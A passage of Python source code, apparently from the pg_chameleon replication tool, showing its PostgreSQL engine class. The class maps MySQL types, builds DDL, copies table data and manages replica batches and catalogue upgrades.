self.pgsql_conn.set_isolation_level(psycopg2.extensions.ISOLATION_LEVEL_AUTOCOMMIT)
self.pgsql_conn.set_client_encoding(self.pg_charset)
self.pgsql_cur=self.pgsql_conn.cursor()
def disconnect_db(self):
"""
The method disconnects from the database closing the connection.
"""
self.pgsql_conn.close()
class pg_engine(object):
"""
The class pg_engine manages the replica initialisation and execution on the PostgreSQL side.
The class connects to the database when instantiated and setup several class attributes used by the replica.
In particular the class dictionary type_dictionary is used to map the MySQL types to the equivalent PostgreSQL types.
Unlike pgloader, which allows the type mapping to be configured, the dictionary is hardcoded, as the fixed mapping is an effort to keep the replica running as smoothly as possible.
The class manages the replica catalogue upgrade using the current catalogue version self.cat_version and the list of migrations self.cat_sql.
If the catalogue version, stored in sch_chameleon.v_version is different from the value stored in self.cat_version then the method upgrade_service_schema() is executed.
"""
def __init__(self, global_config, table_metadata, table_file, logger, sql_dir='sql/'):
self.sleep_on_reindex = global_config.sleep_on_reindex
self.reindex_app_names = global_config.reindex_app_names
self.batch_retention = global_config.batch_retention
self.logger = logger
self.sql_dir = sql_dir
self.idx_sequence = 0
self.pg_conn = pg_connection(global_config)
self.pg_conn.connect_db()
self.table_metadata = table_metadata
self.table_file = table_file
self.type_dictionary = {
'integer':'integer',
'mediumint':'bigint',
'tinyint':'integer',
'smallint':'integer',
'int':'integer',
'bigint':'bigint',
'varchar':'character varying',
'text':'text',
'char':'character',
'datetime':'timestamp without time zone',
'date':'date',
'time':'time without time zone',
'timestamp':'timestamp without time zone',
'tinytext':'text',
'mediumtext':'text',
'longtext':'text',
'tinyblob':'bytea',
'mediumblob':'bytea',
'longblob':'bytea',
'blob':'bytea',
'binary':'bytea',
'varbinary':'bytea',
'decimal':'numeric',
'double':'double precision',
'double precision':'double precision',
'float':'double precision',
'bit':'integer',
'year':'integer',
'enum':'enum',
'set':'text',
'json':'text',
'bool':'boolean',
'boolean':'boolean',
'geometry':'bytea',
}
self.table_ddl = {}
self.idx_ddl = {}
self.type_ddl = {}
self.pg_charset = self.pg_conn.pg_charset
self.cat_version = '1.6'
self.cat_sql = [
{'version':'base','script': 'create_schema.sql'},
{'version':'0.1','script': 'upgrade/cat_0.1.sql'},
{'version':'0.2','script': 'upgrade/cat_0.2.sql'},
{'version':'0.3','script': 'upgrade/cat_0.3.sql'},
{'version':'0.4','script': 'upgrade/cat_0.4.sql'},
{'version':'0.5','script': 'upgrade/cat_0.5.sql'},
{'version':'0.6','script': 'upgrade/cat_0.6.sql'},
{'version':'0.7','script': 'upgrade/cat_0.7.sql'},
{'version':'0.8','script': 'upgrade/cat_0.8.sql'},
{'version':'0.9','script': 'upgrade/cat_0.9.sql'},
{'version':'1.0','script': 'upgrade/cat_1.0.sql'},
{'version':'1.1','script': 'upgrade/cat_1.1.sql'},
{'version':'1.2','script': 'upgrade/cat_1.2.sql'},
{'version':'1.3','script': 'upgrade/cat_1.3.sql'},
{'version':'1.4','script': 'upgrade/cat_1.4.sql'},
{'version':'1.5','script': 'upgrade/cat_1.5.sql'},
{'version':'1.6','script': 'upgrade/cat_1.6.sql'},
]
cat_version=self.get_schema_version()
num_schema=(self.check_service_schema())[0]
if cat_version!=self.cat_version and int(num_schema)>0:
self.upgrade_service_schema()
self.table_limit = ['*']
self.master_status = None
def set_application_name(self, action=""):
"""
The method sets the application name in the replica session using the variable self.pg_conn.global_conf.source_name,
making it simpler to find the replication processes. If the source name is not set then a generic PGCHAMELEON name is used.
"""
if self.pg_conn.global_conf.source_name:
app_name = "[PGCH] - source: %s, action: %s" % (self.pg_conn.global_conf.source_name, action)
else:
app_name = "[PGCH]"
sql_app_name="""SET application_name=%s; """
self.pg_conn.pgsql_cur.execute(sql_app_name, (app_name , ))
def add_source(self, source_name, dest_schema):
"""
The method adds a new source to the replica catalogue.
If the source name is already present an error message is emitted without further actions.
:param source_name: The source name stored in the configuration parameter source_name.
:param dest_schema: The destination schema stored in the configuration parameter dest_schema.
"""
sql_source = """
SELECT
count(i_id_source)
FROM
sch_chameleon.t_sources
WHERE
t_source=%s
;
"""
self.pg_conn.pgsql_cur.execute(sql_source, (source_name, ))
source_data = self.pg_conn.pgsql_cur.fetchone()
cnt_source = source_data[0]
if cnt_source == 0:
sql_add = """
INSERT INTO sch_chameleon.t_sources
(
t_source,
t_dest_schema
)
VALUES
(
%s,
%s
)
RETURNING
i_id_source
;
"""
self.pg_conn.pgsql_cur.execute(sql_add, (source_name, dest_schema ))
source_add = self.pg_conn.pgsql_cur.fetchone()
sql_update = """
UPDATE sch_chameleon.t_sources
SET v_log_table=ARRAY[
't_log_replica_1_src_%s',
't_log_replica_2_src_%s'
]
WHERE i_id_source=%s
;
"""
self.pg_conn.pgsql_cur.execute(sql_update, (source_add[0],source_add[0], source_add[0] ))
sql_parts = """SELECT sch_chameleon.fn_refresh_parts() ;"""
self.pg_conn.pgsql_cur.execute(sql_parts)
else:
print("Source %s already registered." % source_name)
sys.exit()
def get_source_status(self, source_name):
"""
Gets the source status using the source name.
Possible values are:
ready : the source is registered but the init_replica is not yet done.
initialising: init_replica is initialising
initialised: init_replica finished and the replica process is ready to start
stopped: the replica process is stopped
running: the replica process is running
:param source_name: The source name stored in the configuration parameter source_name.
:type source_name: string
:return: source_status extracted from PostgreSQL
:rtype: string
"""
sql_source = """
SELECT
enm_status
FROM
sch_chameleon.t_sources
WHERE
t_source=%s
;
"""
self.pg_conn.pgsql_cur.execute(sql_source, (source_name, ))
source_data = self.pg_conn.pgsql_cur.fetchone()
if source_data:
source_status = source_data[0]
else:
source_status = 'Not registered'
return source_status
def drop_source(self, source_name):
"""
Drops the source from the replication catalogue discarding any replica reference.
:param source_name: The source name stored in the configuration parameter source_name.
"""
sql_delete = """ DELETE FROM sch_chameleon.t_sources
WHERE t_source=%s
RETURNING v_log_table
; """
self.pg_conn.pgsql_cur.execute(sql_delete, (source_name, ))
source_drop = self.pg_conn.pgsql_cur.fetchone()
for log_table in source_drop[0]:
sql_drop = """DROP TABLE sch_chameleon."%s"; """ % (log_table)
self.pg_conn.pgsql_cur.execute(sql_drop)
def set_source_id(self, source_status):
"""
Sets the source status for the source_name and sets the two class attributes i_id_source and dest_schema.
:param source_status: The source status to be set.
"""
sql_source = """
UPDATE sch_chameleon.t_sources
SET
enm_status=%s
WHERE
t_source=%s
RETURNING i_id_source,t_dest_schema
;
"""
source_name = self.pg_conn.global_conf.source_name
self.pg_conn.pgsql_cur.execute(sql_source, (source_status, source_name))
source_data = self.pg_conn.pgsql_cur.fetchone()
try:
self.i_id_source = source_data[0]
self.dest_schema = source_data[1]
self.source_name = source_name
except:
print("Source %s is not registered." % source_name)
sys.exit()
def clean_batch_data(self):
"""
Removes the replica batch data for the given source id.
The method is used to clean up incomplete batch data in case of a crash or an unclean restart of the replica
"""
sql_delete = """
DELETE FROM sch_chameleon.t_replica_batch
WHERE i_id_source=%s;
"""
self.pg_conn.pgsql_cur.execute(sql_delete, (self.i_id_source, ))
def create_schema(self):
"""
The method drops and creates the destination schema.
It also sets the search_path for the cursor to the destination schema.
"""
sql_drop="DROP SCHEMA IF EXISTS "+self.dest_schema+" CASCADE;"
sql_create=" CREATE SCHEMA IF NOT EXISTS "+self.dest_schema+";"
self.pg_conn.pgsql_cur.execute(sql_drop)
self.pg_conn.pgsql_cur.execute(sql_create)
self.set_search_path()
def store_table(self, table_name):
"""
The method saves the table name along with the primary key definition in the table t_replica_tables.
This is required in order to let the replay procedure know which primary key to use when replaying updates and deletes.
If the table has no primary key it is not stored.
A table without a primary key is still copied and its indices are created like any other table.
However the replica doesn't work for tables without a primary key.
If the class variable master_status is set then the master's coordinates are saved along with the table.
This happens in general when a table is added to the replica or the data is refreshed with sync_tables.
:param table_name: the table name to store in the table t_replica_tables
"""
if self.master_status:
master_data = self.master_status[0]
binlog_file = master_data["File"]
binlog_pos = master_data["Position"]
else:
binlog_file = None
binlog_pos = None
table_data=self.table_metadata[table_name]
table_no_pk = True
for index in table_data["indices"]:
if index["index_name"]=="PRIMARY":
table_no_pk = False
sql_insert="""
INSERT INTO sch_chameleon.t_replica_tables
(
i_id_source,
v_table_name,
v_schema_name,
v_table_pkey,
t_binlog_name,
i_binlog_position
)
VALUES
(
%s,
%s,
%s,
ARRAY[%s],
%s,
%s
)
ON CONFLICT (i_id_source,v_table_name,v_schema_name)
DO UPDATE
SET
v_table_pkey=EXCLUDED.v_table_pkey,
t_binlog_name = EXCLUDED.t_binlog_name,
i_binlog_position = EXCLUDED.i_binlog_position
;
"""
self.pg_conn.pgsql_cur.execute(sql_insert, (
self.i_id_source,
table_name,
self.dest_schema,
index["index_columns"].strip(),
binlog_file,
binlog_pos
)
)
if table_no_pk:
self.logger.warning("Missing primary key. The table %s will not be replicated." % (table_name,))
sql_delete = """
DELETE FROM sch_chameleon.t_replica_tables
WHERE
i_id_source=%s
AND v_table_name=%s
AND v_schema_name=%s
;
"""
self.pg_conn.pgsql_cur.execute(sql_delete, (
self.i_id_source,
table_name,
self.dest_schema)
)
def unregister_table(self, table_name):
"""
This method is used when a table has its primary key dropped on MySQL.
The table name is removed from the replication catalogue and the table is renamed.
This way any dependency (e.g. views, functions) on the table is preserved but the replica for it is stopped.
:param table_name: the table name to remove from t_replica_tables
"""
self.logger.info("unregistering table %s from the replica catalog" % (table_name,))
sql_delete=""" DELETE FROM sch_chameleon.t_replica_tables
WHERE
v_table_name=%s
AND v_schema_name=%s
RETURNING i_id_table
;
"""
self.pg_conn.pgsql_cur.execute(sql_delete, (table_name, self.dest_schema))
removed_id=self.pg_conn.pgsql_cur.fetchone()
table_id=removed_id[0]
self.logger.info("renaming table %s to %s_%s" % (table_name, table_name, table_id))
sql_rename="""ALTER TABLE IF EXISTS "%s"."%s" rename to "%s_%s"; """ % (self.dest_schema, table_name, table_name, table_id)
self.logger.debug(sql_rename)
self.pg_conn.pgsql_cur.execute(sql_rename)
def set_search_path(self):
"""
The method sets the search path for the connection.
"""
sql_path=" SET search_path=%s;" % (self.dest_schema, )
self.pg_conn.pgsql_cur.execute(sql_path)
def drop_tables(self):
"""
The method drops the tables present in the table_ddl
"""
self.set_search_path()
for table in self.table_ddl:
self.logger.debug("dropping table %s " % (table, ))
sql_drop = """DROP TABLE IF EXISTS "%s" CASCADE;""" % (table, )
self.pg_conn.pgsql_cur.execute(sql_drop)
def create_tables(self):
"""
The method loops through table_ddl and executes the creation scripts.
No index is created in this method
"""
self.set_search_path()
for table in self.table_ddl:
self.logger.debug("creating table %s " % (table, ))
try:
ddl_enum=self.type_ddl[table]
for sql_type in ddl_enum:
self.pg_conn.pgsql_cur.execute(sql_type)
except psycopg2.Error as e:
self.logger.error("SQLCODE: %s SQLERROR: %s" % (e.pgcode, e.pgerror))
self.logger.error(sql_type)
sql_create=self.table_ddl[table]
try:
self.pg_conn.pgsql_cur.execute(sql_create)
except psycopg2.Error as e:
self.logger.error("SQLCODE: %s SQLERROR: %s" % (e.pgcode, e.pgerror))
self.logger.error(sql_create)
self.store_table(table)
def create_indices(self):
"""
The method creates the indices using the DDL stored in the class list self.idx_ddl.
"""
self.logger.info("creating the indices")
for table in self.idx_ddl:
idx_ddl= self.idx_ddl[table]
self.logger.debug("processing table %s" % (table, ))
for sql_idx in idx_ddl:
self.pg_conn.pgsql_cur.execute(sql_idx)
def copy_data(self, table, csv_file, my_tables={}):
"""
The method copies the data into PostgreSQL using psycopg2's copy_expert.
The csv_file is a file-like object which can be either a csv file or a StringIO object, according to the
configuration parameter copy_mode.
:param table: the table name, used to get the table's metadata out of my_tables
:param csv_file: file like object with the table's data stored in CSV format
:param my_tables: table's metadata dictionary
"""
column_copy=[]
for column in my_tables[table]["columns"]:
column_copy.append('"'+column["column_name"]+'"')
sql_copy="COPY "+'"'+self.dest_schema+'"'+"."+'"'+table+'"'+" ("+','.join(column_copy)+") FROM STDIN WITH NULL 'NULL' CSV QUOTE '\"' DELIMITER',' ESCAPE '\"' ; "
self.pg_conn.pgsql_cur.copy_expert(sql_copy,csv_file)
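# Illustrative expansion (assumed names): for a table "users" with columns id and name
# in schema my_schema, sql_copy above becomes roughly
#   COPY "my_schema"."users" ("id","name") FROM STDIN
#   WITH NULL 'NULL' CSV QUOTE '"' DELIMITER',' ESCAPE '"' ;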
def insert_data(self, table, insert_data, my_tables={}):
"""
The method is a fallback procedure for when the copy method fails.
The procedure performs a row by row insert, very slow but capable of skipping rows with problematic data (e.g. encoding issues).
:param table: the table name, used to get the table's metadata out of my_tables
:param insert_data: the list of row dictionaries to insert
:param my_tables: table's metadata dictionary
"""
column_copy=[]
column_marker=[]
for column in my_tables[table]["columns"]:
column_copy.append('"'+column["column_name"]+'"')
column_marker.append('%s')
sql_head="INSERT INTO "+'"'+self.dest_schema+'"'+"."+'"'+table+'"'+" ("+','.join(column_copy)+") VALUES ("+','.join(column_marker)+");"
for data_row in insert_data:
column_values=[]
for column in my_tables[table]["columns"]:
column_values.append(data_row[column["column_name"]])
try:
self.pg_conn.pgsql_cur.execute(sql_head,column_values)
except psycopg2.Error as e:
self.logger.error("SQLCODE: %s SQLERROR: %s" % (e.pgcode, e.pgerror))
self.logger.error(self.pg_conn.pgsql_cur.mogrify(sql_head,column_values))
except:
self.logger.error("unexpected error when processing the row")
self.logger.error(" - > Table: %s" % table)
self.logger.error(" - > Insert list: %s" % (','.join(column_copy)) )
self.logger.error(" - > Insert values: %s" % (column_values) )
def build_idx_ddl(self):
"""
The method loops over the tables' metadata and builds the DDL statements for primary keys and indices
"""
for table_name in self.table_metadata:
table=self.table_metadata[table_name]
table_name=table["name"]
indices=table["indices"]
table_idx=[]
for index in indices:
indx=index["index_name"]
index_columns=index["index_columns"]
non_unique=index["non_unique"]
if indx=='PRIMARY':
pkey_name="pk_"+table_name[0:20]+"_"+str(self.idx_sequence)
pkey_def='ALTER TABLE "'+table_name+'" ADD CONSTRAINT "'+pkey_name+'" PRIMARY KEY ('+index_columns+') ;'
table_idx.append(pkey_def)
else:
if non_unique==0:
unique_key='UNIQUE'
else:
unique_key=''
index_name='"idx_'+indx[0:20]+table_name[0:20]+"_"+str(self.idx_sequence)+'"'
idx_def='CREATE '+unique_key+' INDEX '+ index_name+' ON "'+table_name+'" ('+index_columns+');'
table_idx.append(idx_def)
self.idx_sequence+=1
self.idx_ddl[table_name]=table_idx
def build_tab_ddl(self):
"""
The method iterates over the tables' metadata and builds the CREATE TABLE statements
"""
if self.table_limit[0] != '*' :
table_metadata = {}
for tab in self.table_limit:
try:
table_metadata[tab] = self.table_metadata[tab]
except:
pass
else:
table_metadata = self.table_metadata
for table_name in table_metadata:
table=self.table_metadata[table_name]
columns=table["columns"]
ddl_head="CREATE TABLE "+'"'+table["name"]+'" ('
ddl_tail=");"
ddl_columns=[]
ddl_enum=[]
for column in columns:
if column["is_nullable"]=="NO":
col_is_null="NOT NULL"
else:
col_is_null="NULL"
column_type=self.type_dictionary[column["data_type"]]
if column_type=="enum":
enum_type="enum_"+table["name"]+"_"+column["column_name"]
sql_drop_enum='DROP TYPE IF EXISTS '+enum_type+' CASCADE;'
sql_create_enum="CREATE TYPE "+enum_type+" AS ENUM "+column["enum_list"]+";"
ddl_enum.append(sql_drop_enum)
ddl_enum.append(sql_create_enum)
column_type=enum_type
if column_type=="character varying" or column_type=="character":
column_type=column_type+"("+str(column["character_maximum_length"])+")"
if column_type=='numeric':
column_type=column_type+"("+str(column["numeric_precision"])+","+str(column["numeric_scale"])+")"
if column["extra"]=="auto_increment":
column_type="bigserial"
ddl_columns.append('"'+column["column_name"]+'" '+column_type+" "+col_is_null )
def_columns=str(',').join(ddl_columns)
self.type_ddl[table["name"]]=ddl_enum
self.table_ddl[table["name"]]=ddl_head+def_columns+ddl_tail
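# Illustrative output (assumed MySQL input): a table
#   t_users(id int auto_increment, name varchar(64) not null)
# yields roughly
#   CREATE TABLE "t_users" ("id" bigserial NOT NULL,"name" character varying(64) NOT NULL);
# The primary key itself is added later by build_idx_ddl() as an ALTER TABLE ... ADD CONSTRAINT ... PRIMARY KEY.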
def get_schema_version(self):
"""
The method gets the service schema version by querying the view sch_chameleon.v_version.
The try-except is used in order to get a valid value "base" if the view is missing.
This happens only if the schema upgrade is performed from very early pg_chameleon versions.
"""
sql_check="""
SELECT
t_version
FROM
sch_chameleon.v_version
;
"""
try:
self.pg_conn.pgsql_cur.execute(sql_check)
value_check=self.pg_conn.pgsql_cur.fetchone()
cat_version=value_check[0]
except:
cat_version='base'
return cat_version
def upgrade_service_schema(self):
"""
The method upgrades the service schema to the latest version using the upgrade files if required.
The method uses the install_script flag to determine whether an upgrade file should be applied.
The variable cat_version stores the schema version. Each element in the class list cat_sql
stores the scripts in the upgrade directory along with the catalogue version associated with the install script.
If the current catalogue version stored in cat_version is equal to the script version the install is skipped but the variable
install_script is set to true. This way any following install script is executed to upgrade the catalogue to the higher version.
The hardcoded 0.7 version is required because that version introduced the multi source feature.
As initially the destination schema was not stored in the migration catalogue, the post migration update
is required to save this information in the replica catalogue.
"""
self.logger.info("Upgrading the service schema")
install_script=False
cat_version=self.get_schema_version()
for install in self.cat_sql:
script_ver=install["version"]
script_schema=install["script"]
self.logger.info("script schema %s, detected schema version %s - install_script:%s " % (script_ver, cat_version, install_script))
if install_script==True:
sql_view="""
CREATE OR REPLACE VIEW sch_chameleon.v_version
AS
SELECT %s::TEXT t_version
;"""
self.logger.info("Installing file version %s" % (script_ver, ))
file_schema=open(self.sql_dir+script_schema, 'rb')
sql_schema=file_schema.read()
file_schema.close()
self.pg_conn.pgsql_cur.execute(sql_schema)
self.pg_conn.pgsql_cur.execute(sql_view, (script_ver, ))
if script_ver=='0.7':
sql_update="""
UPDATE sch_chameleon.t_sources
SET
t_dest_schema=%s
WHERE i_id_source=(
SELECT
i_id_source
FROM
sch_chameleon.t_sources
WHERE
t_source='default'
AND t_dest_schema='default'
)
;
"""
self.pg_conn.pgsql_cur.execute(sql_update, (self.dest_schema, ))
if script_ver==cat_version and not install_script:
self.logger.info("enabling install script")
install_script=True
def check_service_schema(self):
"""
The method checks if the sch_chameleon exists
:return: count from information_schema.schemata
:rtype: integer
"""
sql_check="""
SELECT
count(*)
FROM
information_schema.schemata
WHERE
schema_name='sch_chameleon'
"""
self.pg_conn.pgsql_cur.execute(sql_check)
num_schema=self.pg_conn.pgsql_cur.fetchone()
return num_schema
def create_service_schema(self):
"""
The method installs the service replica service schema sch_chameleon.
"""
num_schema=self.check_service_schema()
if num_schema[0]==0:
for install in self.cat_sql:
script_ver=install["version"]
script_schema=install["script"]
if script_ver=='base':
self.logger.info("Installing service schema %s" % (script_ver, ))
file_schema=open(self.sql_dir+script_schema, 'rb')
sql_schema=file_schema.read()
file_schema.close()
self.pg_conn.pgsql_cur.execute(sql_schema)
else:
self.logger.error("The service schema is already created")
def get_status(self):
"""
The method lists the sources with their running status and the eventual lag
:return: psycopg2 fetchall results
:rtype: psycopg2 tuple
"""
sql_status="""
SELECT
t_source,
t_dest_schema,
enm_status,
date_trunc('seconds',now())-ts_last_received lag,
ts_last_received,
ts_last_received-ts_last_replay,
ts_last_replay
FROM
sch_chameleon.t_sources
ORDER BY
t_source
;
"""
self.pg_conn.pgsql_cur.execute(sql_status)
results = self.pg_conn.pgsql_cur.fetchall()
return results
def drop_service_schema(self):
"""
The method removes the service schema discarding all the replica references.
The replicated tables are kept in place though.
"""
file_schema=open(self.sql_dir+"drop_schema.sql", 'rb')
sql_schema=file_schema.read()
file_schema.close()
self.pg_conn.pgsql_cur.execute(sql_schema)
def save_master_status(self, master_status, cleanup=False):
"""
This method saves the master data, determining which log table should be used in the next batch.
The method also performs a cleanup of the logged events when the cleanup parameter is true.
:param master_status: the master data with the binlogfile and the log position
:param cleanup: if true cleans the not replayed batches. This is useful when resyncing a replica.
"""
next_batch_id=None
master_data = master_status[0]
binlog_name = master_data["File"]
binlog_position = master_data["Position"]
try:
event_time = master_data["Time"]
except:
event_time = None
sql_master="""
INSERT INTO sch_chameleon.t_replica_batch
(
i_id_source,
t_binlog_name,
i_binlog_position
)
VALUES
(
%s,
%s,
%s
)
RETURNING i_id_batch
;
"""
sql_event="""
UPDATE sch_chameleon.t_sources
SET
ts_last_received=to_timestamp(%s),
v_log_table=ARRAY[v_log_table[2],v_log_table[1]]
WHERE
i_id_source=%s
RETURNING
v_log_table[1],
ts_last_received
;
"""
try:
if cleanup:
self.logger.info("cleaning not replayed batches for source %s", self.i_id_source)
sql_cleanup=""" DELETE FROM sch_chameleon.t_replica_batch WHERE i_id_source=%s AND NOT b_replayed; """
self.pg_conn.pgsql_cur.execute(sql_cleanup, (self.i_id_source, ))
self.pg_conn.pgsql_cur.execute(sql_master, (self.i_id_source, binlog_name, binlog_position))
results=self.pg_conn.pgsql_cur.fetchone()
next_batch_id=results[0]
except psycopg2.Error as e:
self.logger.error("SQLCODE: %s SQLERROR: %s" % (e.pgcode, e.pgerror))
self.logger.error(self.pg_conn.pgsql_cur.mogrify(sql_master, (self.i_id_source, binlog_name, binlog_position)))
try:
self.pg_conn.pgsql_cur.execute(sql_event, (event_time, self.i_id_source, ))
results = self.pg_conn.pgsql_cur.fetchone()
log_table_name = results[0]
db_event_time = results[1]
self.logger.info("Saved master data for source: %s" %(self.source_name, ) )
self.logger.debug("Binlog file: %s" % (binlog_name, ))
self.logger.debug("Binlog position:%s" % (binlog_position, ))
self.logger.debug("Last event: %s" % (db_event_time, ))
self.logger.debug("Next log table name: %s" % ( log_table_name, ))
except psycopg2.Error as e:
self.logger.error("SQLCODE: %s SQLERROR: %s" % (e.pgcode, e.pgerror))
self.pg_conn.pgsql_cur.mogrify(sql_event, (event_time, self.i_id_source, ))
return next_batch_id
def get_batch_data(self):
"""
The method updates the batch status to started for the given source_id and returns the
batch information.
:return: psycopg2 fetchall results without any manipulation
:rtype: psycopg2 tuple
"""
sql_batch="""
WITH t_created AS
(
SELECT
max(ts_created) AS ts_created
FROM
sch_chameleon.t_replica_batch
WHERE
NOT b_processed
AND NOT b_replayed
AND i_id_source=%s
)
UPDATE sch_chameleon.t_replica_batch
SET
b_started=True
FROM
t_created
WHERE
t_replica_batch.ts_created=t_created.ts_created
AND i_id_source=%s
RETURNING
i_id_batch,
t_binlog_name,
i_binlog_position,
(SELECT v_log_table[1] from sch_chameleon.t_sources WHERE i_id_source=%s) as v_log_table
;
"""
self.pg_conn.pgsql_cur.execute(sql_batch, (self.i_id_source, self.i_id_source, self.i_id_source, ))
return self.pg_conn.pgsql_cur.fetchall()
def insert_batch(self,group_insert):
"""
Fallback method for the batch insert. Each row event is processed
individually and any problematic row is discarded into the table t_discarded_rows.
The row is encoded in base64 in order to prevent any encoding or type issue.
:param group_insert: the event data built in mysql_engine
"""
self.logger.debug("starting insert loop")
for row_data in group_insert:
global_data = row_data["global_data"]
event_data = row_data["event_data"]
event_update = row_data["event_update"]
log_table = global_data["log_table"]
event_time = global_data["event_time"]
sql_insert="""
INSERT INTO sch_chameleon."""+log_table+"""
(
i_id_batch,
v_table_name,
v_schema_name,
enm_binlog_event,
t_binlog_name,
i_binlog_position,
jsb_event_data,
jsb_event_update,
i_my_event_time
)
VALUES
(
%s,
%s,
%s,
%s,
%s,
%s,
%s,
%s,
%s
)
;
"""
try:
self.pg_conn.pgsql_cur.execute(sql_insert,(
global_data["batch_id"],
global_data["table"],
global_data["schema"],
global_data["action"],
global_data["binlog"],
global_data["logpos"],
json.dumps(event_data, cls=pg_encoder),
json.dumps(event_update, cls=pg_encoder),
event_time
)
)
except:
self.logger.error("error when storing event data. saving the discarded row")
self.save_discarded_row(row_data,global_data["batch_id"])
def save_discarded_row(self,row_data,batch_id):
"""
The method saves the discarded row in the table t_discarded_rows along with the id_batch.
The row is encoded in base64 as the t_row_data is a text field.
:param row_data: the row data dictionary
:param batch_id: the id batch where the row belongs
"""
b64_row=base64.b64encode(str(row_data))
sql_save="""
INSERT INTO sch_chameleon.t_discarded_rows
(
i_id_batch,
t_row_data
)
VALUES
(
%s,
%s
);
"""
self.pg_conn.pgsql_cur.execute(sql_save,(batch_id,b64_row))
def write_batch(self, group_insert):
"""
Main method for adding the batch data in the log tables.
The row data from group_insert are mogrified in CSV format and stored in
the string like object csv_file.
psycopg2's copy expert is used to store the event data in PostgreSQL.
Should any error occur the procedure falls back to insert_batch.
:param group_insert: the event data built in mysql_engine
"""
csv_file=io.StringIO()
self.set_application_name("writing batch")
insert_list=[]
for row_data in group_insert:
global_data=row_data["global_data"]
event_data=row_data["event_data"]
event_update=row_data["event_update"]
log_table=global_data["log_table"]
insert_list.append(self.pg_conn.pgsql_cur.mogrify("%s,%s,%s,%s,%s,%s,%s,%s,%s" , (
global_data["batch_id"],
global_data["table"],
self.dest_schema,
global_data["action"],
global_data["binlog"],
global_data["logpos"],
json.dumps(event_data, cls=pg_encoder),
json.dumps(event_update, cls=pg_encoder),
global_data["event_time"],
)
)
)
csv_data=b"\n".join(insert_list ).decode()
csv_file.write(csv_data)
csv_file.seek(0)
try:
sql_copy="""
COPY "sch_chameleon"."""+log_table+"""
(
i_id_batch,
v_table_name,
v_schema_name,
enm_binlog_event,
t_binlog_name,
i_binlog_position,
jsb_event_data,
jsb_event_update,
i_my_event_time
)
FROM
STDIN
WITH NULL 'NULL'
CSV QUOTE ''''
DELIMITER ','
ESCAPE ''''
;
"""
self.pg_conn.pgsql_cur.copy_expert(sql_copy,csv_file)
except psycopg2.Error as e:
self.logger.error("SQLCODE: %s SQLERROR: %s" % (e.pgcode, e.pgerror))
self.logger.error(csv_data)
self.logger.error("fallback to inserts")
self.insert_batch(group_insert)
def set_batch_processed(self, id_batch):
"""
The method updates the flag b_processed and sets the processed timestamp for the given batch id.
The event ids are aggregated into the table t_batch_events used by the replay function.
:param id_batch: the id batch to set as processed
"""
self.logger.debug("updating batch %s to processed" % (id_batch, ))
sql_update="""
UPDATE sch_chameleon.t_replica_batch
SET
b_processed=True,
ts_processed=now()
WHERE
i_id_batch=%s
;
"""
self.pg_conn.pgsql_cur.execute(sql_update, (id_batch, ))
self.logger.debug("collecting events id for batch %s " % (id_batch, ))
sql_collect_events = """
INSERT INTO
sch_chameleon.t_batch_events
(
i_id_batch,
i_id_event
)
SELECT
i_id_batch,
array_agg(i_id_event)
FROM
(
SELECT
i_id_batch,
i_id_event,
ts_event_datetime
FROM
sch_chameleon.t_log_replica
WHERE i_id_batch=%s
ORDER BY ts_event_datetime
) t_event
GROUP BY
i_id_batch
;
"""
self.pg_conn.pgsql_cur.execute(sql_collect_events, (id_batch, ))
def process_batch(self, replica_batch_size):
"""
The method calls the function fn_process_batch with the parameters batch size and the id_source.
The plpgsql function returns true if there are still rows to process. When all rows are replayed
the method exits.
:param replica_batch_size: the max rows to process in a single function call.
"""
self.set_application_name("replay batch")
batch_loop=True
sql_process="""SELECT sch_chameleon.fn_process_batch(%s,%s);"""
self.logger.info("Replaying batch for source %s replay size %s rows" % ( self.source_name, replica_batch_size))
while batch_loop:
self.pg_conn.pgsql_cur.execute(sql_process, (replica_batch_size, self.i_id_source))
batch_result=self.pg_conn.pgsql_cur.fetchone()
batch_loop=batch_result[0]
if batch_loop:
self.logger.info("Still working on batch for source %s replay size %s rows" % (self.source_name, replica_batch_size ))
else:
self.logger.info("Batch replay for source %s is complete" % (self.source_name))
self.logger.debug("Cleanup for replayed batches older than %s for source %s" % (self.batch_retention, self.source_name))
sql_cleanup="""
DELETE FROM
sch_chameleon.t_replica_batch
WHERE
b_started
AND b_processed
AND b_replayed
AND now()-ts_replayed>%s::interval
AND i_id_source=%s
;
"""
self.set_application_name("cleanup old batches")
self.pg_conn.pgsql_cur.execute(sql_cleanup, (self.batch_retention, self.i_id_source ))
self.set_application_name("idle")
def add_foreign_keys(self, source_name, fk_metadata):
"""
        The method creates the foreign keys extracted from the mysql catalog.
        The keys are created initially as NOT VALID and then validated. If an error happens
        it is displayed on the log destination.
:param source_name: the source name, required to determine the destination schema
:param fk_metadata: the foreign keys metadata extracted from mysql's information schema
"""
fk_list = []
sql_schema="""
SELECT
t_dest_schema
FROM
sch_chameleon.t_sources
WHERE
t_source=%s
;
"""
self.pg_conn.pgsql_cur.execute(sql_schema, (source_name, ))
dschema=self.pg_conn.pgsql_cur.fetchone()
destination_schema = dschema[0]
self.logger.info("creating the not validated foreign keys in schema %s" % destination_schema)
fk_counter = 0
for foreign_key in fk_metadata:
table_name = foreign_key["table_name"]
fk_name = foreign_key["constraint_name"][0:20] + "_" + str(fk_counter)
fk_cols = foreign_key["fk_cols"]
referenced_table_name = foreign_key["referenced_table_name"]
ref_columns = foreign_key["ref_columns"]
fk_list.append({'fkey_name':fk_name, 'table_name':table_name})
sql_fkey = ("""ALTER TABLE "%s"."%s" ADD CONSTRAINT "%s" FOREIGN KEY (%s) REFERENCES "%s"."%s" (%s) NOT VALID;""" %
(
destination_schema,
table_name,
fk_name,
fk_cols,
destination_schema,
referenced_table_name,
ref_columns
)
)
fk_counter+=1
self.logger.debug("creating %s on %s" % (fk_name, table_name))
try:
self.pg_conn.pgsql_cur.execute(sql_fkey)
except psycopg2.Error as e:
self.logger.error("could not create the foreign key %s on table %s" % (fk_name, table_name))
self.logger.error("SQLCODE: %s SQLERROR: %s" % (e.pgcode, e.pgerror))
self.logger.error("STATEMENT: %s " % (self.pg_conn.pgsql_cur.mogrify(sql_fkey)))
self.logger.info("validating the foreign keys in schema %s" % destination_schema)
for fkey in fk_list:
sql_validate = 'ALTER TABLE "%s"."%s" VALIDATE CONSTRAINT "%s";' % (destination_schema, fkey["table_name"], fkey["fkey_name"])
try:
self.pg_conn.pgsql_cur.execute(sql_validate)
except psycopg2.Error as e:
self.logger.error("could not validate the foreign key %s on table %s" % (fkey["table_name"], fkey["fkey_name"]))
self.logger.error("SQLCODE: %s SQLERROR: %s" % (e.pgcode, e.pgerror))
